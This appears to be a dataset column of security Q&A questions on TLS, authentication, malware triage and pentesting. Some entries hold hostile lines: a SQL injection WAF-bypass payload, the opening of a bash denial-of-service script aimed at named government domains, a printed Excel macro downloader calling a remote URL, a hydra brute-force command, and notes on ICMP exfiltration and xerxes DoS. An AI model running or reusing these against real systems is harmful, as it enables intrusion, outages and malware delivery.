instruction
stringlengths
24
29.9k
So a company I work with currently is using a password management system that lets us retrieve the passwords for an application by providing a secure key to an API. Currently, the key is stored in the code of the app so it is passed to the API easily. My belief is that it is insecure and a best practice would be to us...
As the title suggests, I would like to expose a couple of read-only endpoints without requiring a key or token. The endpoints will allow the user to request their data for the purposes of displaying it on their website. The reason I am considering this is that I want to avoid the user having to go through the extra wor...
I want to serialize and deserialize models that contain user input. Marshal is a serialization library built into Ruby. By design, ::load can deserialize almost any class loaded into the Ruby process. In many cases this can lead to remote code execution if the Marshal data is loaded from an untrusted source. As a resu...
As I understand from reading another question here, SRAM may be more dangerous than traditional volatile RAM in terms of storing passwords and other sensitive information. I know that when a computer is shut down, any data in the RAM (if it's regular volatile RAM) will be gone within seconds or minutes unless it is sup...
I want to bypass a sql injection waf that replaces /,* and whitespaces. This is a payload I want use : ?parameter=22321'union select CAST(normal_column AS bigint),'a','b' from normal_table-- But the website replaces the whitespaces with nothing before parse query. I decided to use '/**/' instead of whitespaces but the...
The difference between anonymity and untraceability is clear for me in the context of e.g. voting (you have to identify your self but your vote can not be traced back to you guaranteeing untraceability but not anonymity). However, when we talk about a device sending a broadcast message, for me the difference between an...
I heard many years ago from word of mouth that this kind of malware exists, which could for example blow up capacitors in your PC. Has such malware or something even remotely similar ever existed? How do you technically detect such malware (if it already exists)? How is it called? Isn't it kind of unrealistic to ha...
The following code: #!/usr/bin/bash TARGETS=("nalog.gov.ru" "www.nalog.gov.ru" "customs.gov.ru" "www.customs.gov.ru" "ffs.ru" "www.ffs.ru" "crimea-post.ru" "www.crimea-post.ru" "minfin.gov.ru" "www.minfin.gov.ru") echo "This script is going to daemonize in order to accomplish denial-of-service." for t in "${TARGETS[...
I have the following the situation: I have some data structures which look like this: { id: int name: BLOB password: VARCHAR(80) ... } There it is easy to store the encrypted fields in the MySQL database because I could simply use a field of type BLOB for the binary data. But I also have some fields wh...
I have a server that seems to be compromised checking the processes running I see an executable that seems to be a mining malware and the hacker uses it to mine litecoin at the address MKkb4o9jUYmcQRRkpJWK82mW2S1ZZMtaLg, the executable file is deleted from the server but I was able to recover it from the server's memor...
I know that port scanning can set off IDS systems on certain networks due to the suspicious traffic it generates. Can the usage of Wireshark be detected on a network? If so, will using it set off any alert systems, and can it be traced back to you?
Question in short: If I consider just the first 16 bytes of SHA-1 and SHA-256 hashes, do they have substantially the same collision risk? Background: I have an application where I need a 16-byte (exactly) hash of a short string (a few bytes to tens of bytes). My plan is to use SHA-1 and simply truncate to 16 bytes. A...
How important is it to humanize the mobile-app registration process in order to prevent bot registrations? I was under the impression that CAPTCHA, probably the leading technology in this space, was made exclusively for computer-based web browsers because, unlike mobile apps that don't expose source code, web browsers ...
I used to run Mimikatz in one of my computers. Then, I did something to block its action and I do not recall what it was. I am trying to revert it unsuccessfully. .#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benja...
I need to verify a password before decrypting the data. My encrypted data is too big and waiting to see if the authentication tag is correct is out of the question. I’m using Argon2id as my KDF. My question is, can I hash the derived key with SHA256 and before decryption compare it to avoid start decrypting if the hash...
I have a client requirement to implement login without password. During sign in an otp will be sent to the user's email address and the user can use it to login. This will have an expiry. No password will be used here. Is the implementation SOC2 compliant and according to US IT laws?
I've been reading up on Certificate Transparency (CT), but can't find anywhere how a client (like a browser) is supposed to check if the certificate is present in any of the certificate transparency logs. Let's take Google Chrome as an example, as Google seems to be a key proponent of CT. How does Chrome check if the c...
As I understand it, Certificate Transparancy provides proof to the client that the presented certificate is publicly accessible in CT logs. The certificate being in the logs enables a domain owner to detect that a certificate has been issued for its domain that was not requested by him, which would be worrying. The dom...
I recently had an idea about this: Why is the geo-location not used as authentication to ensure ownership of an account/login in addition to a password? This would work over GPS which is quite precise nowadays, up to 5 metres or so. I see that certain problems come with this, especially that not every device has GPS. I...
Space.com's SpaceX Starlink satellite internet terminals arrive in Ukraine, The Verge's Elon Musk’s promised Starlink terminals have reached Ukraine and Vice Prime Minister of Ukraine and Minister of Digital Transformation of Ukraine's tweet: Starlink — here. Thanks, @elonmusk explain that requested Starlink coverage...
I'm wondering what security threats I should be aware of if I set up a testing farm (like STF) which will have several Android devices connected to PCs over USB. The Android devices will have USB debugging enabled and the PC will be able to communicate with the Android device I plan to run tests using frameworks like ...
I'm trying to crack a wallet.dat hash from an old file from 2013. I created a hash with bitcoin2john and it is 112 characters. I can't get it to work. I'm wondering if there is something wrong with my command or the hash itself. I've seen on other sites the Bitcoin Core wallet.dat dashes are sometimes 114 or 115 charac...
Applications that use cryptographically signed information for multiple purposes have the risk that one piece of signed information can be exchanged with another. When you use JWTs as session tokens, and you use JWTs as password reset tokens, the password reset tokens should not be valid as session tokens. So a piece o...
I am trying to understand the extent to which SSL certificates secure the content (or activities) over SSL. Here is my understanding: Under a hypothetical condition: Person-A is the Administrator of a windows laptop. Person-B is a non-admin user of that laptop. My understanding: When person-B visits a CA-Signed SSL c...
A question I came up with while reading in my information security class. Let's say website ABC which uses username and password combinations to authenticate users and has a user John. When John goes to ABC.com to log in to his account and types his password, is the hashed version of the password transmitted to ABC's s...
What componets of a PC do firmware viruses and rootkits infect? Secure boot is supposed to protect you from these types of viruses. Although, it doesn't protect you against rootkits in UEFI firmware itself? If so is there anything to protect you from rootkits in UEFI firmware and others what is the best way to prote...
We previously had some AWS keys. The IAM interface show/showed no usage for it but the employee has been able to upload resources. Could anyone advise how to check if the interface is just erring or if they were perhaps not using these credentials? The ATHENA Queries i was tried SELECT eventTime, eventName, userIdentit...
I'm learning about data exfiltration using ICMP and delivery of a payload is generally done using the -p "pad bytes" in ping -c 1 -p $encoded_payload. Are there often legitimate use for "pad bytes"? Can it simply be stripped by a firewall in most cases?
The methods presented in https://xsleaks.dev/ are based on the fact that malicious Javascript can use Cross-origin requests to infer data by means of faulty status codes, time required, mime type etc. If the server were to check beforehand whether the request contains a legitimate token, and if this is not the case, re...
The following code demonstrates the source code of this challenge and basically, I need to send a post request with arbitrary code to execute on the server. However, after multiple attempts Im unable to run any bash with the http request? What am I doing wrong here? <!DOCTYPE html> <html lang="en"> <head> <meta c...
I run a site that displays user-generated SVGs. They are untrusted, so they need to be sandboxed. I currently embed these SVGs using <object> elements. (Unlike <img>, this allows loading external fonts. And unlike using an <iframe>, the <object> resizes to the SVG's content size. See this discussion.) However, I don't ...
I mainly use Linux and am not very familiar with Windows shares so my apologies if this question sounds noobish. Say I'm attacking a Windows machine and host an SMB share from my Linux machine with malware in that share. I want to run the malware from that share on the victim machine. Would AV try to quarantine/delete ...
I am using an ISP provided router in bridge mode with my own router. Where is the risk of getting hacked? Can my ISP provided router in bridge mode (=modem) be hacked? Can it get firmware updates when in bridge mode?
In an openssh-server login to a GNU/Linux machine to use a private ssh key encrypted with an N-characters passphrase, then sshd_config: PasswordAuthentication no PubkeyAuthentication yes is it equivalent to use a login with a password that is always N-characters long? PasswordAuthentication yes PubkeyAuthentication no...
I am using a DNS forwarder, it's not open to the WWW (runs only in the LAN) and in the dnsmasq logs I noticed something off: Ignoring query from non-local network Has my network been breached? Dnsmasq is running on Pi-Hole with most of the logging disabled. I know, I kind of shot myself in the foot there. All of the i...
I continue to see emails in my sent folder that I haven't sent. I change my password and it stops for a few days only to return. What could they be? Why would yahoo send unsubscribe emails? Example: unsubscribe@neptunecigar.com Below that line my yahoo email is listed. I change my password but they still come back. I'v...
Our organization is currently being tested by a IT security firm who have stated that while our internet facing mail gateway is not an open relay, they can connect to it on port 25 using telnet and check if an internal address is valid or not using RCPT TO. The firm has stated that this leaves us open to address enume...
Long story short, got duped into opening an XLSM in Excel, with macros being enabled. Realised instantly. Digged into the Excel structure, found the following (extremely obfuscated) payload: =CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/l55mri/Pl9TE5LYUHTCpuglHEkP/","..\enu.ocx",0,0) =I...
I go from location to location sometimes and I want to be able to access my resources from my home network like SMB shares or my ProxMox server. Obviously, since these services are on my LAN, I cannot access them if I am not on the network. Would it be generally more secure to set up a proper SSH shell with a publicly ...
In connection with recent events, I, as an ordinary citizen of Russia, wonder - can smartphone manufacturers (Google, Apple, Huawei, etc.) or any another (such as Microsoft, Cisco etc) remotely turn off my phone (or any another device)? I see questions like this have been asked, but they usually say "remote enable" and...
I know maltego has a haveibeenpwned module/transform. Assuming an attacker ran a bunch of emails through that module and got a few positive hits for haveibeenpwned, what can be done with those results? If the attacker is a white hat pentester, I can't imagine anything special to do with the email since the leaked data ...
There is a bug in a widely used payment processing SAAS provider that I have tried reporting to them. And if they had showed it to an engineer they would have understood. I don't have time to keep dealing with their less than useful support staff. Where can I responsibly report this vulnerability so that they can tak...
I saw the recent CVE-2022-0492 that can enable container escape, and I have a decent understanding of cgroups and container capabilities, but not very familiar with how hybrid cgroup v1/v2 works, nor how cgroups and capabilities work together. However, looking at the commit the vulnerable code is only related to cgroup...
Is oauth2 designed to handle single-sign-on between a desktop application and a webapp? The scenario looks like this: The desktop app has a username/password login After a user is authenticated in the desktop app, there are links to a browser app which when opened, should automatically authenticate the user which is l...
A burglar took my phone so I reported it to the police and phone company to blacklist it. They only asked for the first IMEI even though the phone has two IMEI since it can accomodate two SIMs. The IMEIs are consecutive when stripping the check digit at the end. Can the thief use the other slot with the non blackliste...
An attacker tweaks xerxes by setting the number of CONNECTIONS in xerxes to 1 instead of 8, like so: #define CONNECTIONS 1 They then attack with xerxes-executable mydomain 433. Their strategy is to use eight time less connections from each attacking IP / machine and to launch a distributed attack from the eight times ...
I am working on an open source project, and am currently stumped. Let’s say I have a client connect to a wireless WPA network I am not authenticated to the wireless network I just have a wireless card in monitor mode. Is there a way Is there something I can send the client that will cause them to send something in resp...
Let's say that I have a single-page web app written in JavaScript and a server-side API, both changeable by me. The app calculates some values based on user input and POSTs these to the API. The values are based on user input but do not contain user input. For instance it might ask the user to pick A or B based on radi...
My Java 11 application is being upgraded to fix the log4shell flaw. So first Spring Boot has been upgraded to the latest version. As my project uses Maven to manage its dependencies, I set the log4j version in the dependencyManagement section so that anywhere log4j is used the latest version is picked up : <dependency...
I read this post but I want to know more details. I know that Google uses a Windows' function called CryptProtectData to encrypt user passwords on Windows and Google only stores the encrypted forms of password on its database and does not know the encryption keys. So now my question is how the Sync actually works then!...
To my knowledge, there's no common standard for sysadmins to publish trusted domains for specific use cases. If it exists, I would presume that this might limit phishing attacks. Think of my question here as an extension of SPF/DMARC/DKIM, where you go beyond simply saying what domains are authorized to what each domai...
I am thinking of developing of a rather primitive CLI program for the sole purpose of detecting rootkits/bootkits/firmware modifying advanced malware. Can you iterate thru all all hardware IDs (CPUID, GPUID etc) like dmidecode does just for ALL hardware (so including PCIe, TPM, etc etc) and generate their hashes? Wha...
This is a fundamental question, but, I'm interested in understanding the "venn diagram" of attack vectors between wired and Wi-Fi connections. What are the attacks that both wired and Wi-Fi are vulnerable to? And what are the attacks that are exclusive to Wi-Fi? What I know so far: Evidently, I know that we can prevent...
When you are working with secret keys, if your code branches unequally it could reveal bits of the secret keys via side channels. So for some algorithms it should branch uniformly independently of the secret key. On C/C++/Rust, you can use assembly to be sure that no compiler optimizations will mess with the branching....
I have been asked to investigate what capabilities exist within Windows 10 where the environment for this system is isolated. I believe it would not be able to benefit from an enterprise security management and cloud data management (supporting assets are not available), which appears to be the assumed context when I l...
I have a server (M: Main) that I trust very much (I have it home, locked, with an alarm, etc), to which I can SSH from the internet. I also have a number of "remote servers" and "IoT devices" (O: Others) that I trust a bit less (because they are outside in the world, physically accessible to other people than me). "In ...
The OpenSSH developers have written in a description of the "agent restrictions" feature that FIDO2 tokens are vulnerable to phishing attacks: https://www.openssh.com/agent-restrict.html FIDO keys that require user-presence confirmation offer a little more defence, but are also similarly phishable. However, on the FI...
I have the following private key. I'd like to be able to process it into an instance of ECPrivateKey using Bouncycastle (or the builtin Java security API if bouncycastle isn't necessary). -----BEGIN EC PRIVATE KEY----- MIGTAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBHkwdwIBAQQgtqnvswtIdNxKy07B D3Y9vvlpwvSDqWCvyWmWTNea2ImgCgYIKoZI...
Through a casual Google search I came to this Stack Overflow result. I clicked it absent-mindedly, could not connect through the server and saw that he domain was some Chinese government proxy server. Wait, what? Googling proxy.hongze.gov.cn directly, I found that Google has indexed many such sites: I am curious: wha...
On an iPhone I have a mail account in the native Mail app with two distinct e-mail addresses, and a certificate that lists both of those e-mail addresses in the SAN field. When I try to send mail with one of the two addresses in the "from" field, encryption and signature work fine. When I select the other address in th...
hydra -l ap.prpgramming -P ~/most-common-pass/best15.txt 203.xx.xx.xx http-post-form://203.xx.xx.xx:yy/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=https://youtube.com/c/approgramming&testcookie=1:The password is incorrect How to create a command where it fails on 2 conditions? I.E. The password i...
I read about TPM2 with PCR locking full-disk encryption from different sources. For example [1]. What I can't understand is how much does this protect from full server theft. If we assume that TPM2 module is secure (attacker can't read it), proper PCR locking is implemented and direct reading RAM of the system is not a...
In Windows logs, I found that C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe launched C:\Program Files\Internet Explorer\iexplore.exe" -dualengineadapter... which in turn launched "C:\Windows\System32\WScript.exe" "C:\Users\john\Downloads\color.js". I'm not allowed to add the content of color.js, but I ca...
I'm not using an identity provider. I have a small system with access and refresh tokens and it works well. Assume the system follows the "typical" approach: when user authenticates or refreshes: he gets a new refresh token refresh token is just an opque value, e.g. a random buffer a hash of it is stored in the databa...
I want to set up a plotly dashboard and view it from my browser. Plotly gets set up as a flask application. I'm of the understanding that I should use a WSGI server to host it. I'm looking at waitress in particular. Does waitress, or WSGI servers in general, connect to devices outside of the network? In other words, if...
We have recently had some software installed that uses a web-based panel as well as an application. We have been using the application software, but we have been asked to implement the web-based panel, which is fine. It seemed fairly simple as most of it was one using the software itself to create the site and all we h...
Basically the title. For example, how bad is it to store passwords in an Excel sheet protected with a password, instead of storing passwords in Keypass or something else like Zoho Vault? Of course, this sheet would be in a safe place as well: besides the password to open the sheet, an attacker would need the password t...
Because of all the problems associated with "roll-your-own cryptography", I am looking for an existing standard for standalone authentication using asymmetric keys. Scenario/threat model Machine-to-machine connections between services. During a connection, the client (connection initiator) should be able to enable mul...
I’m looking for Term Or Some platform for managing Password Authentication with this way : Password construct from 2 Part , First one is static and you can make it and second Part Generate From TOTP System as an example : In 13:00 Jinx password for login Is Abc627028 And in 13:01 Jinx Password for login Is Abc002839 ...
Prior to 2008 before Dan Kaminsky finds the DNS issue, the resolver checked only the Transaction ID. I have seen videos in which it is explained if an attacker manages to send a DNS response like (example.com: type A, class IN, address 192.0.2.6) to resolver before the original response from authoritative name server i...
Information Protection Officer at my work requested me to produce a version of our Android App (quote) "...without SSL pinning for our.backend.domain.name.com" for vulnerability scanning purpose. What does this mean? How can I produce this? Where can I find out more about this? As additional information, the app has be...
I'm trying to detect refresh token reuse / replay. A typical approach: send refresh token (on login or refresh) create refresh token as opaque value (e.g. buffer from a CSPRNG) base64 encode value and send to user salt and hash value, store in database (store hash rather than value, in case db is stolen) receive re...
As already discussed on this platform, TLS Client Hello messages are not encrypted, since they contain "no sensitive data". When sniffing HTTPS requests with wireshark, I can see the domain I am trying to access in the Client Hello packets though, which seems like sensitive data to me. This behavior can also be observe...
We are deploying android tablets with a shared pin for users in an office. If the device was stolen or in the hands of a hacker, what can a hacker do on the network (realistically)? Android does NOT have a command prompt so therefore would not able to run commands like Windows. We are looking to disable Google play to ...
In logs, I found lsass.exe spawning lsass.exe. C:\Windows\System32\smss.exe C:\Windows\System32\smss.exe C:\Windows\System32\wininit.exe C:\Windows\System32\lsass.exe C:\WINDOWS\system32\lsass.exe lsass.exe should always be a child process of wininit.exe on Windows Vista and later. So, I'm wondering, what ca...
I'm building a IOT platform for my home as a hobby. Currently, I'm trying to implement device authentication. A device in my case could be a Raspberry Pi, Arduino, Jetson Nano. To authenticate devices I want to use HMAC. A device is assigned a shared key, which is saved in a database and on the device. The device calcu...
This vulnerability is from a third party reviewer for PCI scans. I am stuck for months and can't figure this out. I already used sanitation to my page and it still fail the PCI scanning. I am starting to think that this is not a code related issue. Can someone please give me any idea on how to resolve this, please? DC...
We are considering using the Soundex algorithm to improve our search capabilities in our app. Our app data are encrypted in the DB. (EAS256) The Soundex result will be stored in clear next to our encrypted data. In fact, the Soundex calculation will be done at the same time of the encryption. I would like to know if th...
I was erasing a SSD with ATA secure erase and thought about the following: When enhanced secure erase is performed on a SSD or NVMe which supports this operation, the master key which is used to encrypt all data is erased and newly generated, so that all written data can't be read anymore. So far so good. The process o...
Let's say you have a CSR that filled with incorrect data and you need to issue a certificate to the associated private key holder. The private key holder will not issue another CSR and will not disclose their private key. Can you overwrite every data field when you issue a corresponding certificate? There are a lot of ...
I teleworked for a medium-sized software company. We had a network architect who offered me a firewall to install so I could securely access on-premises resources and play around with some configuration settings because I'm interested in security. The CEO was also given a firewall for his home. I have reason to believe...
Does adding a non-root user do anything except hinder your own ability to make mistakes? Given the new updates on file perms in WSL2 (docs on file perms, more docs), doing everything as root on linux might actually be more secure (maybe I'm wrong here though). Relevant conversation on the WSL github: https://github.com...
Question about a solution in portswigger academy (since portswigger explains nothing and I can't find any info elsewhere on this): Break out of the img attribute by searching for: Here is the img attribute being broken out of: How do the double quote and angle bracket break out of the attribute exactly? I can't figu...
My state has made a statement that in case my country will be disconnected from the world's CAs, it is necessary to install its own state certificates. In many forums, information has flashed that in this case, having its own certificate, the state will be able to decrypt all HTTPS traffic. Is it true or not?
I've been trying to understand the process how the certificates are being registered and wildcard certificates got my attention. For some companies that offer free hosting in their site, I noticed that clients with free accounts can also have a valid SSL certificate. For example, company of ABC Hosting with website of ...
Session keys are generated during TLS handshake and are transferred from clients to server through asymmetric encryption FOR ONCE. However, I have heard that session keys are single-use, which mean a new set of session keys are going to be re-generated after the end of a session, thus here comes my question: How are s...
I first ran this command: nslookup www.certifiedhacker.com This was the output: Non-authoritative answer: www.certifiedhacker.com canonical name = certifiedhacker.com. Name: certifiedhacker.com Address: 162.241.216.11 When I ran: nslookup 162.241.216.11 this was the output. 11.216.241.162.in-addr.arpa name = box...
I've read and heard from multiple sources over the years that rotating symmetric keys used to encrypt and decrypt large amounts of data over time (for example all of the network traffic from some facility) is a good practice (if not really mandatory). I understand that if for some reason the key was exposed, we'd want ...
VirtualBox has an option to encrypt the drive of a VM. When I installed Debian or Ubuntu, I have the option to say that I want the full disk encrypted. I'm thinking that both do pretty much the same thing in this situation and they are not both required. However, the VirtualBox encryption, I would imagine, also prevent...
My website allows medical professionals to sign up for an account. After they sign up and provide basic information about their credentials and their practice, we tell them that we need to manually verify their credentials before their account is activated. My question is: What do I tell the user if he or she tries to ...
I train on vulnerable boxes and during my recon phase, I use nmap to collect info on open ports. I use the command nmap -sS [IP|URL] and no matter the machine, I get the result that port 554 - RTSP open. But my mate used the same command and didn't get the same report (his results seems more accurate). Whether it's a T...
The other day I was using Google News, clicked a Politico link, and got a popup saying Google had selected me to get a free iPad if I answered some survey questions. I didn't fall for it but I had never gotten anything like this before on my device. I posted on the support forum and some "Platinum Product Expert" said ...
Does the result output line of john the ripper show all the words tried? E.g. does this line 0g 0:00:00:08 DONE (2022-03-11 06:00) 0g/s 1665Kp/s 1665Kc/s 1665KC/s 99CS .. 9999 mean that john tried all the words in the range between 99CS and 9999? Or what should I read from this? Background is that I have generated a wo...
When adding an account on a mail client, the SSL/TLS is usually turned off and the encryption method is 'none' (see Outlook example below). Is the password safely sent through the internet when authenticating using the default settings? It's hard for me to believe that reputable mail clients, such as Outlook, allow se...
So we want to block file uploads on WhatsApp but since it's encrypted, I doubt this can be done, however, can PANOS decrypt WhatsApp?? I ask because WhatsApp doesn't exactly use SSL right, it's more of a PGP sort of encryption, can we decrypt that? We're using Palo alto firewalls, they support decryption for TLS traffi...
According to this article Dell Support can help a user to gain access to data after forgetting the HDD password: Once Dell Support has provided the reset password, you enter this when prompted and then press Ctrl + Enter to complete the process. ... the BIOS should accept the reset password, clear the password, and al...
In this question (CSRF cookie vs session based tokens), folks recommend against storing the CSRF token in a cookie, saying that storing it in the session server-side is more secure. What vulnerability exists for storing the token in a cookie as well as in a form field, then confirming these match server side when proce...
Could it be practical to authenticate API request through digital signature (based on headers and message body)? This would be asymmetric instead of something like HMAC which is not a signature. Are there performance or other constraints that make this impractical? I know JWTs can be signed with asymmetric but signi...
I was able to start a session using metasploit framework (msf6) with an android but after a while being in the session, the meterpreter session closes. Luckily however after a few seconds, another stage payload gets sent out, giving me access to another meterpreter session. I could login AGAIN using sessions <id> I'm t...
I'm writing a python application that will do some operations that will require root privileges. Instead of asking for user password every time i decided to use server client model. A python script will be executed as root user using pkexec and it will act as a server. The main python script (gui) will ask the server t...